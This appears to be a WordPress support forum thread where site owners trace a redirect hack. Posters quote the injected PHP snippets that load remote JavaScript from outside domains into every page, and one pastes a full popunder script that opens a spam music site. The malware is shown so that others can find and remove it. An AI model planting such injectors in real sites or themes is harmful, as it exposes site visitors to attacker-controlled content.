So the code that needs to be removed is:
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
Removing this code fixed one of my sites perfectly, but the other one still is not fixed.
the code I had to remove was close to the code you found, but just a little bit different.
Here is the code that I removed
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
🙁 Someone could take a look to my site? colegiosagradoscorazonesmedellin.edu.co i have the same trouble 🙁
I looked at the source code to your site. I do not see the unwanted jquerys.org code. You must have fixed it?
Oh man, thanks for the help, for take the time to see the source
No, maybe is a plugin, but is impossible to guess when the redirection will happen.
Now i know that my template is not corrupted. Thanks a lot for that men!
I appreciate it
I am facing same problem with my client website.. Trying to figure it out
Does it also happens to forums?
I am having the same issue with this stupid downloadfreemusic.com hack….although since I’m now working on the site offline, I can’t direct anyone to it for help. I did notice that when I view the source code, the script below is loaded on the Blog page. Any idea on where to find this in the files to delete?
<script type="text/javascript">
var puShown = false;
function doOpen(url)
{
if ( puShown == true )
{
return true;
}
win = window.open(url, 'wmPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=800,width=1200');
if ( win )
{
win.blur();
puShown = true;
}
return win;
}
function setCookie(name, value, time)
{
var expires = new Date();
expires.setTime( expires.getTime() + time );
document.cookie = name + '=' + value + '; expires=' + expires.toGMTString();
}
function getCookie(name) {
var cookies = document.cookie.toString().split('; ');
var cookie, c_name, c_value;
for (var n=0; n<cookies.length; n++) {
cookie = cookies[n].split('=');
c_name = cookie[0];
c_value = cookie[1];
if ( c_name == name ) {
return c_value;
}
}
return null;
}
function initPu()
{
if ( document.attachEvent )
{
document.attachEvent( 'onclick', checkTarget );
}
else if ( document.addEventListener )
{
document.addEventListener( 'click', checkTarget, false );
}
}
function checkTarget(e)
{
if ( !getCookie('popundr') ) {
var e = e || window.event;
var win = doOpen('http://www.downloadmusicfreenow.com/');
setCookie('popundr', 1, 24*60*60*1000);
}
}
initPu();
</script>
[Moderator Note: Please post code or markup snippets between backticks or use the code button. As it stands, your code may now have been permanently damaged/corrupted by the forum’s parser.]
@johnnydoughnyc
When posting code please use the code button above. With more than 10 lines of code please use pastebin.com
Note to self! Sorry about that 🙂 Btw, if anyone can help…I would be greatly appreciative.
Nevermind…genius over here figured it out 😉
Any chance you could point me in the right direction Johnny?
I’m having a similar problem.
if you use Modernize themes, just open the functions.php and check this
include'include/plugin/post.php'; // post function
add double-slash to make it as comment like this :
//include'include/plugin/post.php'; // post function << known to call malicious code
and just delete the post.php at your plugin folder.
HTH
Please someone help me. I have the same redirection problem on the same website. The only thing is that i checked everyhing listed here, and didnt find the problem. Can someone check my website?
I can also send you a theme in ZIP if needed.
Please post your own topic.
